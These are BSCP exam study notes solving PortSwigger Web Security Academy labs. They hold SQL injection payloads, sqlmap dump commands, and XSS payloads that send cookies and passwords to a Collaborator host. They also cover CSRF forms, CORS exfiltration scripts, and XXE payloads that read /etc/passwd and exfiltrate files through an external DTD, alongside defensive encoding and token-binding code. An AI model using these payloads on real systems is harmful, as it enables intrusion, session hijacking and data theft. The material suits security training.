Web Security

Uploaded by st.jaideepsingh (376 pages)

Tutor: Martin Voelk (Cyber Allegiance)
Tutor: P.Narendra
Mentor: Kurt Picker
Practitioner: Shaik.Sharif

Dedicated to: ROXY PICKER

NOTE: these notes are only for those preparing for the BSCP (Burp Suite Certified Practitioner) exam.
SQL injection
1.SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

'+OR+1=1--

2.SQL injection vulnerability allowing login bypass


administrator'--

3.SQL injection attack, querying the database type and version on Oracle

https://portswigger.net/web-security/sql-injection/cheat-sheet
'+UNION+SELECT+'abc','def'+FROM+dual--
'+UNION+SELECT+BANNER,+NULL+FROM+v$version--

4.SQL injection attack, querying the database type and version on MySQL and Microsoft

https://portswigger.net/web-security/sql-injection/cheat-sheet
'+UNION+SELECT+'abc','def'#
'+UNION+SELECT+@@version,+NULL#

5.SQL injection attack, listing the database contents on non-Oracle databases

'+UNION+SELECT+NULL,NULL,NULL--

'+UNION+SELECT+NULL,NULL--
'+UNION+SELECT+'test',NULL--

'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--

'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_dyshki'--
'+UNION+SELECT+username_motymq,+password_djwsqr+FROM+users_dyshki--

Generic steps (non-Oracle DB; the lab randomises the table and column names, so read them from the output of steps 3 and 4):
1.'+UNION+SELECT+NULL,NULL,NULL--   (find the number of columns)
2.'+UNION+SELECT+NULL,'text',NULL--   (find a column that accepts text)
3.'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
4.'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcd'--
5.'+UNION+SELECT+username_abcd,+password_abcd+FROM+users_abcd--

6.SQL injection attack, listing the database contents on Oracle

'+UNION+SELECT+'abcd','abcd'+FROM+dual--
'+UNION+SELECT+table_name,NULL+FROM+all_tables--

'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_BQUDLY'--
'+UNION+SELECT+USERNAME_KOUJQE,+PASSWORD_LQZPIU+FROM+USERS_BQUDLY--

Generic steps (Oracle; every SELECT needs a FROM clause, hence dual, and the names in all_tables/all_tab_columns are upper case):
1.'+UNION+SELECT+'abcd','abcd'+FROM+dual--
2.'+UNION+SELECT+table_name,NULL+FROM+all_tables--
3.'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_abcd'--
4.'+UNION+SELECT+USERNAME_abcd,+PASSWORD_abcd+FROM+USERS_abcd--

7.SQL injection UNION attack, determining the number of columns returned by the query

'+UNION+SELECT+NULL,NULL--

'+UNION+SELECT+NULL,NULL,NULL--
8.SQL injection UNION attack, finding a column containing text

'+UNION+SELECT+NULL,NULL,NULL--

'+UNION+SELECT+'qAHeV2',NULL,NULL--
'+UNION+SELECT+NULL,'qAHeV2',NULL--

9.SQL injection UNION attack, retrieving data from other tables

'+UNION+SELECT+NULL,NULL--
'+UNION+SELECT+'abc','def'--

'+UNION+SELECT+username,+password+FROM+users--

10.SQL injection UNION attack, retrieving multiple values in a single column

'+UNION+SELECT+NULL--
'+UNION+SELECT+NULL,NULL--

'+UNION+SELECT+'abc',NULL--

'+UNION+SELECT+NULL,'abc'--

'+UNION+SELECT+NULL,username||'~'||password+FROM+users--

11.Blind SQL injection with conditional responses

sqlmap -u 'https://0ab6006604a6bec381c50c1a009600a6.web-security-academy.net/filter?category=Pets' --batch --cookie='TrackingId=hCdZpm3RIhAjSadp; session=mvT1WoxfxNWEBiUV5lx28iPm4BatoIiX' --level 2

sqlmap -u 'https://0a5b0057046696ec842c656a00bc00e1.web-security-academy.net/filter?category=Pets' --batch --cookie='TrackingId=ZFlMm5XiRtbyqhF2; session=GK2MgwoBJWrr2iapVxUm7FtUUrey2NX3;' --level 2 --dbms=PostgreSQL --dump --threads=5

Generic form:
sqlmap -u 'URL' --cookie='TrackingId=...; session=...' --level 2 --dbms=<DBMS> --dump --threads=5

--level 2 is what makes sqlmap test the cookie values (the injection point here is the TrackingId cookie). If the DBMS is not known, run the first command without --dbms; sqlmap reports the DBMS it fingerprints, then rerun with --dbms set and --dump.

12.Blind SQL injection with conditional errors

sqlmap -u 'https://0add00bf0308b05c80d2081000400038.web-security-academy.net/filter?category=Gifts' --batch --cookie='TrackingId=e2x1fWjeRRwwGMJj; session=seHSk6vY7ex1N1LTgNMUyissKFsani43' --level 2

sqlmap -u 'https://0add00bf0308b05c80d2081000400038.web-security-academy.net/filter?category=Gifts' --batch --cookie='TrackingId=e2x1fWjeRRwwGMJj; session=seHSk6vY7ex1N1LTgNMUyissKFsani43' --level 2 --dbms=Oracle --dump --threads=5

Generic form, as in lab 11:
sqlmap -u 'URL' --cookie='TrackingId=...; session=...' --level 2 --dbms=<DBMS> --dump --threads=5

(If the DBMS is unknown, run with --level 2 and without --dbms first; once sqlmap reports the DBMS, rerun with --dbms set and --dump.)

13.Visible error-based SQL injection


' AND CAST((SELECT 1) AS int)--

' AND 1=CAST((SELECT 1) AS int)--

' AND 1=CAST((SELECT username FROM users) AS int)--


' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--

' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--

14.Blind SQL injection with time delays

x'||pg_sleep(10)--

Conditional time delays (from the cheat sheet)

You can test a single boolean condition and trigger a time delay if the condition is true:

Oracle:      SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual
Microsoft:   IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'
PostgreSQL:  SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END
MySQL:       SELECT IF(YOUR-CONDITION-HERE,SLEEP(10),'a')

15.Blind SQL injection with time delays and information retrieval

sqlmap -u 'https://0aca002a0305766c812852e2006e00bc.web-security-academy.net' --cookie='TrackingId=CcAxvaAEWazRKNsX; session=5PAqn0elilmn9o7LWv0Ovt1iVsjHQfdO;' --level 2 --batch

sqlmap -u 'https://0aca002a0305766c812852e2006e00bc.web-security-academy.net' --cookie='TrackingId=CcAxvaAEWazRKNsX; session=5PAqn0elilmn9o7LWv0Ovt1iVsjHQfdO;' --batch --level 2 --dbms=PostgreSQL --dump --threads=5

Take the administrator password from the dump and log in.

Generic form, as in lab 11:
sqlmap -u 'URL' --cookie='TrackingId=...; session=...' --level 2 --dbms=<DBMS> --dump --threads=5

(If the DBMS is unknown, run with --level 2 and without --dbms first; once sqlmap reports the DBMS, rerun with --dbms set and --dump.)

16.Blind SQL injection with out-of-band interaction

TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

17.Blind SQL injection with out-of-band data exfiltration

TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

(Both are Oracle: the XXE inside xmltype makes the database itself fetch the URL, and in 17 the password becomes the subdomain of the lookup, so read it from the hostname in the Collaborator interaction.)

18.SQL injection with filter bypass via XML encoding

UNION SELECT username ||'~'||password from users
Put it in the storeId element of the stock-check XML and encode it with Extensions > Hackvertor > Encode > dec_entities or hex_entities: the WAF does not decode XML character entities, the server's XML parser does.

Cross-site scripting

1.Reflected XSS into HTML context with nothing encoded

<script>alert(1)</script>

2.DOM XSS in document.write sink using source location.search

Search for a random string, right-click and inspect the element, and observe that your random string has been placed inside an img src attribute.

Break out of the attribute in the search bar: "><svg onload=alert(1)>

3.DOM XSS in innerHTML sink using source location.search

The search term is written into a span (check the span id in the page source) through innerHTML. Script tags inserted that way do not execute, so use an event handler; give this payload in the search box:

<img src=1 onerror=alert(1)>

4.DOM XSS in jQuery anchor href attribute sink using location.search source

1. On the Submit feedback page, change the query parameter returnPath to / followed by a random alphanumeric string.
2. Right-click and inspect the element, and observe that your random string has been placed inside an a href attribute.
3. Change returnPath to:

javascript:alert(document.cookie)

Hit enter and click "back".

5.DOM XSS in jQuery selector sink using a hashchange event

If the main page response has a hashchange handler that feeds location.hash into a jQuery selector, it is vulnerable.

Confirmation: add # followed by the heading of any post to the URL; the page scrolls to that post.

The exploit is an iframe that loads the page and then changes its own src to append the payload after the #, because the hashchange event only fires when the fragment changes (every time you want the print function to run, the src value has to change):

<iframe src="https://YOUR-LAB-ID.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>

Send it to the victim from the exploit server.

6.Reflected XSS into attribute with angle brackets HTML-encoded


"onmouseover="alert(1)

7.Reflected XSS into a JavaScript string with angle brackets HTML encoded

'-alert(1)-'

8.DOM XSS in document.write sink using source location.search inside a select element

The stock-check script on the product page reads a storeId parameter from the URL, but the URL only carries productId, so add storeId yourself. Its value is written with document.write into an option tag inside the select, so to get XSS you have to close the select element first:

"></select><img%20src=1%20onerror=alert(1)>

9.DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded

If the response contains an ng-app attribute, the body is an AngularJS scope and {{...}} expressions in it are evaluated, so no angle brackets or quotes are needed. Give this in the search bar:

{{$on.constructor('alert(1)')()}}

10.Reflected [DOM XSS]


\"-alert(1)}//

11.Stored [DOM XSS]


<><img src=1 onerror=alert(1)>
12.Exploiting cross-site scripting to steal cookies

In the post-comment field, post a payload that sends document.cookie to Burp Collaborator (the lab solution uses fetch with mode no-cors):

<script>fetch('https://BURP-COLLABORATOR-SUBDOMAIN', {method: 'POST', mode: 'no-cors', body: document.cookie});</script>

When the victim views the comment, Collaborator receives their session and secret cookies; swap the victim's session value into your own cookie.

13.Exploiting cross-site scripting to capture passwords

In the post-comment field, post fake login fields; the victim's browser autofills them and the onchange handler sends both values to Collaborator:

<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://BURP-COLLABORATOR-SUBDOMAIN',{method:'POST',mode: 'no-cors',body:username.value+':'+this.value});">

Put your Collaborator domain in, post it, then check Collaborator for the username and password.

14.Exploiting XSS to perform CSRF

The target is the change-email function, which is protected by a CSRF token. Send both the GET /my-account and the POST /my-account/change-email requests to Repeater to see where the token comes from. The comment payload makes a same-origin request to /my-account, extracts the csrf token from the response and POSTs the change-email request with it; paste it in the post-comment field.

15.Reflected XSS into HTML context with most tags and attributes blocked

Send the search request to Repeater, then to Intruder with the tag list from the cheat sheet (https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) to find a tag that is not blocked (body). Send the body tag to Intruder again as <body%20§§=1> with the event-handler list to find an allowed event (onresize).

Now create an iframe that loads the payload and resizes itself so the onresize event fires:

<iframe src="https://YOUR-LAB-ID.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>
16.Reflected XSS into HTML context with all tags blocked except custom ones

/?search=<xss+id%3dx+onfocus%3dalert(document.cookie)+tabindex%3d1>#x

17.Reflected XSS with some SVG markup allowed

Same approach as lab 15: Intruder with the cheat-sheet tags (svg and animatetransform are allowed), then the events (onbegin).

https://YOUR-LAB-ID.web-security-academy.net/?search=%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert(1)%3E

18.Reflected XSS in canonical link tag

The request URL is reflected in the href of the canonical link tag in the head of the response, so a single quote breaks out of the attribute:

'accesskey='x'onclick='alert(1)

https://YOUR-LAB-ID.web-security-academy.net/?%27accesskey=%27x%27onclick=%27alert(1)

It worked only in Chrome. To trigger the exploit on yourself, press one of the following key combinations:

On Windows: ALT+SHIFT+X
On MacOS: CTRL+ALT+X
On Linux: Alt+X

19.Reflected XSS into a JavaScript string with single quote and backslash escaped
</script><script>alert(1)</script>

20.Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped

The search term is reflected inside a JavaScript string (var searchTerm = '...'). Single quotes are escaped with a backslash but the backslash itself is not, so a leading backslash neutralises the escape:

\'-alert(1)//

21.Stored XSS into onclick event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped

The website field of a comment is reflected inside an onclick tracker handler. The browser decodes HTML entities before the handler is parsed as JavaScript, so use &apos; for the quotes; append this to the website URL:

?&apos;-alert(1)-&apos;

22.Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped

The search term is reflected inside backticks (a template literal), and ${...} is still evaluated there even though the quotes and backticks are escaped:

${alert(1)}
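Every XSS entry above is really a statement about which characters the page encodes for which context. The following is an added example, not code from these notes or from the labs: the labs' partial defences reproduced as encoder functions, a correct encoder for each of the two contexts, and two parser-based checks that tell whether a payload escaped its context. The sink shapes (an input value attribute, var searchTerm = '...') follow the lab descriptions; the checks and the encoder names are mine.

```python
"""Context-specific output encoding: why the XSS payloads above defeat the
labs' partial defences and what a correct encoder does instead."""
import html
import json
import re
from html.parser import HTMLParser

# --- the defences the labs apply --------------------------------------------
def angle_only(s):                       # labs 6, 7: only < and > are entity-encoded
    return s.replace("<", "&lt;").replace(">", "&gt;")

def escape_single_quote(s):              # lab 20: ' -> \' but \ is left alone
    return angle_only(s).replace("'", "\\'")

def escape_quote_and_backslash(s):       # lab 19: ' and \ escaped, but </script> not
    return s.replace("\\", "\\\\").replace("'", "\\'")

# --- correct encoders for each context ---------------------------------------
def html_attribute(s):
    return html.escape(s, quote=True)    # &, <, >, " and ' all encoded

def js_string_literal(s):
    """A JS string literal safe inside <script>: JSON quoting plus \\uXXXX for
    the characters the HTML parser cares about (json.dumps leaves < alone)."""
    out = json.dumps(s)
    for ch in "<>&":
        out = out.replace(ch, "\\u%04x" % ord(ch))
    return out

def single_quoted(encoder):
    """The labs wrap the escaped value in single quotes themselves."""
    return lambda s: "'" + encoder(s) + "'"

# --- render into the two sinks -----------------------------------------------
def render_attribute(value, encoder):
    return '<input value="%s">' % encoder(value)

def render_js(value, literal):
    return "<script>var searchTerm = %s;</script>" % literal(value)

# --- checks: did the payload escape its context? ------------------------------
class _InputAttrs(HTMLParser):
    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)

def input_attributes(markup):
    """Attributes the HTML parser sees on the input tag; an injected event
    handler shows up here as an attribute of its own."""
    p = _InputAttrs()
    p.feed(markup)
    return p.attrs

_JS_STRING = re.compile(r"""^(?:'(?:[^'\\]|\\.)*'|"(?:[^"\\]|\\.)*")$""")

def js_string_intact(markup):
    """True iff the script still holds exactly one string literal and the
    script block was not terminated early by a </script> in the value."""
    start = markup.index("var searchTerm = ") + len("var searchTerm = ")
    end = markup.index(";</script>")
    literal = markup[start:end]
    return bool(_JS_STRING.match(literal)) and markup.count("</script>") == 1
```

html.escape handles the attribute case; for the script case note that JSON encoding alone is not enough, because `</script>` inside a JSON string is still `</script>` to the HTML parser, which is exactly the lab 19 payload.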

Cross-site request forgery (CSRF)

1.CSRF vulnerability with no defenses

The update-email functionality has no CSRF protection: generate a CSRF PoC for the POST /my-account/change-email request (right-click > Engagement tools > Generate CSRF PoC), host it on the exploit server and deliver it to the victim.

2.CSRF where token validation depends on request method

The token is only validated for POST. Change the request method to GET in Repeater (the csrf parameter can be dropped) and build the PoC from that request.

3.CSRF where token validation depends on token being present

The token is only validated when the csrf parameter is present. Remove the parameter entirely, confirm in Repeater that the email still changes, then generate the CSRF PoC with Engagement tools and send it to the client.

4.CSRF where token is not tied to user session

Log in to two different accounts. The CSRF value changes on every page load, but a token issued to one user is accepted for another: intercept your own change-email request, drop it and reuse its unused token in the PoC sent to the victim.
If the PoC does not work, change the request from HTTP/2 to HTTP/1.

5.CSRF where token is tied to non-session cookie

The csrf token is tied to a csrfKey cookie rather than to the session, and the search function reflects its input into a Set-Cookie header, so a crafted search URL can plant your csrfKey in the victim's browser. Generate the CSRF PoC, copy it to a text editor and make the following changes:

<form action="https://0a90006503f7a443816ae00500900090.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="1&#64;g1mail&#46;com" />
<input type="hidden" name="csrf" value="DYpNz3v984opuI0yEILRLy3zEJtsEOKu" />
<input type="submit" value="Submit request" />
</form>

Remove the whole script block and in its place add an img tag whose src is the search URL that sets your csrfKey cookie (Set-Cookie: csrfKey=YOUR-KEY; SameSite=None) and whose onerror submits the form. In the payload use your own csrf token and csrfKey, and change the email as well.

6.CSRF where token is duplicated in cookie

The csrf form field is only compared with the csrf cookie ("double submit"), so any value works as long as the cookie matches. Change the email and send it, then refresh the browser to check whether it changes.

Create a URL that uses the CRLF injection in the search function to inject a fake csrf cookie into the victim's browser (change the lab id):
/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None

Change the email in the request and generate the CSRF PoC with Engagement tools:

<form action="https://0a0900e104dc98df803c8acd00e60006.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="hacker123&#64;1&#46;com" />
<input type="hidden" name="csrf" value="fake" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>

Delete the whole script block and in its place put the URL you built above, as the src of an img tag whose onerror submits the form:

<form action="https://0a0900e104dc98df803c8acd00e60006.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="hacker123&#64;1&#46;com" />
<input type="hidden" name="csrf" value="fake" />
<input type="submit" value="Submit request" />
</form>
<img src="https://0a0900e104dc98df803c8acd00e60006.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None" onerror="document.forms[0].submit()">

Store it and send it to the victim.
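Labs 4 and 6 fail for the same reason: nothing on the server binds the token to the session that presents it. The following is an added example, not the labs' code; the server key and session ids are constructed. It shows the double-submit comparison that lab 6 performs next to a token derived from the session id under a server-side key, and runs both against the two attacks.

```python
"""A double-submit CSRF check with no server-side binding (lab 6), next to
a token bound to the session with a server key (defeats labs 4 and 6)."""
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)   # in production: loaded from config, rotated

def double_submit_ok(cookies, form):
    """Lab 6 check: the csrf form field only has to equal the csrf cookie.
    Neither value is tied to the server or to the session, so anyone who can
    set a cookie on the victim (here via the CRLF injection in /?search=)
    chooses both sides of the comparison."""
    cookie = cookies.get("csrf")
    return cookie is not None and cookie == form.get("csrf")

def issue_token(session_id):
    """Token derived from the session id under a server-side key; the client
    cannot compute it and a token for one session is useless for another."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def session_bound_ok(cookies, form):
    session_id = cookies.get("session")
    token = form.get("csrf")
    if not session_id or not token:
        return False
    return hmac.compare_digest(issue_token(session_id), token)

# Constructed scenario: two sessions the server has issued.
VICTIM = {"session": "victim-session-id"}
ATTACKER = {"session": "attacker-session-id"}

def lab6_attack():
    """The victim's browser carries the injected csrf=fake cookie and the PoC
    form submits csrf=fake. Returns (naive check, session-bound check)."""
    cookies = {**VICTIM, "csrf": "fake"}
    form = {"email": "hacker@example.com", "csrf": "fake"}
    return double_submit_ok(cookies, form), session_bound_ok(cookies, form)

def lab4_attack():
    """The attacker logs in, takes a fresh token from their own session and
    puts it in the PoC. Returns whether the victim's session accepts it."""
    form = {"email": "hacker@example.com", "csrf": issue_token(ATTACKER["session"])}
    return session_bound_ok(VICTIM, form)

def legitimate_request():
    form = {"email": "wiener@normal-user.net", "csrf": issue_token(VICTIM["session"])}
    return session_bound_ok(VICTIM, form)

if __name__ == "__main__":
    print(lab6_attack(), lab4_attack(), legitimate_request())
```

A random per-session token stored server-side works just as well; what matters is that the token is bound to the session and that the comparison happens against something the client cannot set.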

7.SameSite Lax bypass via method override

The session cookie is set in the POST /login response without a SameSite attribute; Strict and None are not mentioned, so Chrome applies Lax by default, and the change-email request has no csrf token. Lax still sends the cookie on top-level GET navigations, so convert the request to a GET and use the _method=POST override parameter that the server honours:

GET /my-account/change-email?email=...&_method=POST

If it works in Repeater, put it in a PoC (a script that sets document.location to that URL) and send it to the victim.

8.SameSite Strict bypass via client-side redirect

If a cookie is set with SameSite=Strict, browsers will not send it in any cross-site request. In simple terms, if the target site of the request does not match the site shown in the browser's address bar, the cookie is not included. The way around it is a client-side redirect on the target site itself: the post-comment confirmation page redirects to a path taken from a URL parameter, and that redirect is same-site, so the cookie is sent.

It successfully redirects to my account when the parameter is given a traversal (../my-account), so create a simple JavaScript payload that sets document.location to the confirmation URL with the change-email path and query in that parameter, and send it to the victim.

9.SameSite Strict bypass via sibling domain

The target is the live chat. First I created a payload to confirm the chat gives a reply; it does, and the WebSocket handshake response sets no cookies, so cross-site connections are not restricted by SameSite. In the Target tab I noticed a sibling subdomain (cms-YOUR-LAB-ID.web-security-academy.net); its login page reflects the username without encoding.

Enter an XSS payload in that login form and check it works. Then:
1. Build the script that opens a WebSocket to the chat, sends READY to get the history and forwards every message to the exploit server's /exploit URL.
2. URL-encode it and put it in the username parameter of the sibling domain's login URL.
3. Send that URL to the victim.

Because the sibling domain is same-site with the lab, the victim's Strict session cookie is sent with the WebSocket handshake.

10.CSRF where Referer validation depends on header being present

The request is only checked when a Referer header is present. Add <meta name="referrer" content="no-referrer"> to the PoC so the browser sends no Referer, and send it to the victim.

11.CSRF with broken Referer validation

Send the original request again and generate the CSRF PoC. The server only checks that the Referer contains the lab domain, so in the exploit server put the lab domain after a ? in the exploit's own URL (/exploit?YOUR-LAB-ID.web-security-academy.net), add the header Referrer-Policy: unsafe-url so the full URL is sent as the Referer, and send it to the victim; the email changes.

DOM-based vulnerabilities

1.DOM XSS using web messages

The home page has a message listener that writes event.data into the DOM with innerHTML, so any origin can post it a payload:

<iframe src="https://0a010018036ca06a806649b100e0004d.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">

2.DOM XSS using web messages and a JavaScript URL

Load the home page: its listener only checks that the message contains "http:" or "https:" before assigning it to location.href, so a javascript: URL with the expected substring in a comment passes:

<iframe src="https://0a010018036ca06a806649b100e0004d.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:print()//http:','*')">

3.DOM XSS using web messages and JSON.parse

The listener JSON.parses the message and, for type load-channel, assigns the url property to an iframe src:

<iframe src=https://0aa4005703044440849114c5006000e9.web-security-academy.net/ onload='this.contentWindow.postMessage("{\"type\":\"load-channel\",\"url\":\"javascript:print()\"}","*")'>

4.DOM-based open redirection

On a blog post, append &url=http://example.com to the URL: the "Back to blog" link takes its destination from the url parameter. Then click "Back to blog" and you are sent to the external URL.

5.DOM-based cookie manipulation

The product page stores the current URL in a lastViewedItem cookie, and the home page writes that cookie into the page without encoding. Append this to the product URL, then click back to the home page to confirm it fires:

&'><script>print()</script>

After confirmation create the payload below (the iframe loads the product URL once to set the cookie, then navigates to the home page where the cookie is rendered) and send it to the victim:

<iframe src="https://YOUR-LAB-ID.web-security-academy.net/product?productId=1&'><script>print()</script>" onload="if(!window.x)this.src='https://YOUR-LAB-ID.web-security-academy.net';window.x=1;">

Cross-origin resource sharing (CORS)

1.CORS vulnerability with basic origin reflection

Add an Origin header to the GET /accountDetails request:
Origin: https://example.com
The response reflects it in Access-Control-Allow-Origin together with Access-Control-Allow-Credentials: true, so any origin can read the response with the victim's cookies. Host a script on the exploit server that makes a credentialed XMLHttpRequest to /accountDetails and sends the response to the exploit server log, deliver it to the victim and go to the access log; you will see an entry with the victim's data. Take it to Decoder and URL-decode it to get the API key.

2.CORS vulnerability with trusted null origin

The server trusts the null origin, which a sandboxed iframe produces:

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="
<script> var req = new XMLHttpRequest(); req.onload = reqListener;
req.open('get','https://YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
req.withCredentials = true; req.send(); function reqListener() {
location='https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key='+encodeURIComponent(this.responseText); };</script>"></iframe>

Modify your lab id and exploit server id, send it to the victim, then get the key from the access log and URL-decode it.

3.CORS vulnerability with trusted insecure protocols

The stock check feature opens a pop-up on a subdomain (stock.YOUR-LAB-ID.web-security-academy.net), and the main site trusts that subdomain over plain http as well. The productId parameter of the stock page is reflected without encoding, so the exploit navigates the victim to the http:// stock subdomain with a script in productId that performs the credentialed CORS request and forwards the response to the exploit server. Change your lab and exploit server ids.
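The three CORS labs differ only in the origin check the server applies. As an added example (not lab code; the origins are hypothetical), here are those checks as functions beside a strict allow-list and a fourth common mistake (prefix matching), with a helper that answers the question the attacker cares about: can a page at this origin read a credentialed response?

```python
"""Origin checks behind the three CORS labs, side by side with a strict
allow-list. Each policy returns the Access-Control-Allow-Origin value to
send, or None to send no CORS headers at all."""
from urllib.parse import urlsplit

SITE = "https://shop.example"      # hypothetical main origin, not a lab host
TRUSTED = {SITE}

def reflect_origin(origin):         # lab 1: whatever the client sent
    return origin

def trust_null(origin):             # lab 2: "null" (sandboxed iframe, file://, some redirects)
    return origin if origin in TRUSTED or origin == "null" else None

def trust_any_subdomain(origin):    # lab 3: subdomain check that ignores the scheme
    host = urlsplit(origin).hostname or ""
    if host == "shop.example" or host.endswith(".shop.example"):
        return origin
    return None

def prefix_match(origin):           # common real-world bug: startswith on the string
    return origin if origin.startswith(SITE) else None

def strict_allowlist(origin):       # exact scheme + host + port match
    return origin if origin in TRUSTED else None

def cors_headers(policy, origin):
    allowed = policy(origin)
    if allowed is None:
        return {}
    return {"Access-Control-Allow-Origin": allowed,
            "Access-Control-Allow-Credentials": "true"}

def leaks_credentials_to(policy, origin):
    """True iff a page at `origin` could read an authenticated response:
    the browser requires ACAO to equal the origin and ACAC to be true."""
    h = cors_headers(policy, origin)
    return (h.get("Access-Control-Allow-Origin") == origin
            and h.get("Access-Control-Allow-Credentials") == "true")

if __name__ == "__main__":
    policies = [("reflect", reflect_origin), ("null", trust_null),
                ("subdomain", trust_any_subdomain), ("prefix", prefix_match),
                ("strict", strict_allowlist)]
    origins = ["https://attacker.test", "null", "http://stock.shop.example",
               "https://shop.example.attacker.test", SITE]
    for name, policy in policies:
        print(name, [leaks_credentials_to(policy, o) for o in origins])
```

Lab 3's check is the subtle one: the hostname is right, but an http:// origin can be spoofed by anyone on the victim's network path, and any XSS on any subdomain inherits the trust.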

XML external entity (XXE) injection

1.Exploiting XXE using external entities to retrieve files

Insert the DTD between the XML declaration and the stockCheck element, then replace the productId value with the entity reference:

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

&xxe;

2.Exploiting XXE to perform SSRF attacks

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>

The lab server is running a (simulated) EC2 metadata endpoint at the default URL, http://169.254.169.254/. This endpoint can be used to retrieve data about the instance, some of which might be sensitive. (Why that IP: 169.254.169.254 is the link-local address cloud providers use for the instance metadata service; it only answers requests coming from the instance itself, which is exactly what an XXE or SSRF from the server gives you. Follow the path names returned at each step, e.g. latest/meta-data/iam/security-credentials/admin, until the response contains the credentials.)

3.Blind XXE with out-of-band interaction

<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> ]>

4.Blind XXE with out-of-band interaction via XML parameter entities

<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> %xxe; ]>

Regular entities are blocked here, so a parameter entity (the % form) is used; it is referenced inside the DTD itself (%xxe;), so the entity name and the reference must stay the same. Check Collaborator for the interaction.

5.Exploiting blind XXE to exfiltrate data using a malicious external DTD

Basically, to exploit this kind of bug you first host a DTD on the exploit server. Create a file like the one below (a parameter entity cannot be declared with a literal % inside another entity's value, hence &#x25; for the inner one):

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'>">
%eval;
%exfil;

Store it, then in Burp reference the exploit server URL from the request's DTD:

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/exploit"> %xxe;]>

Go to Collaborator and check the HTTP interaction: the file contents are in the request's query string.

6.Exploiting blind XXE to retrieve data via error messages

Same structure, but the inner entity points at a file path that does not exist, so the parser's error message echoes the contents of /etc/passwd:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;

Store it on your exploit server, then:

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>

7.Exploiting XInclude to retrieve files

Some injection points are not an XML document you control: here the productId value is embedded server-side into an XML document, so there is no XML declaration or DOCTYPE for you to modify. An active scan of the parameter flags XInclude. Put this in the productId value:

<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>

8.Exploiting XXE via image file upload

The avatar upload accepts SVG, which is XML, so upload an SVG file with the entity in it. The first attempt (an image element pointing at the file) does not work:

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200"><image xlink:href="file:///etc/hostname"></image></svg>

The last payload is the one that works: the entity is rendered as text inside the image:

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

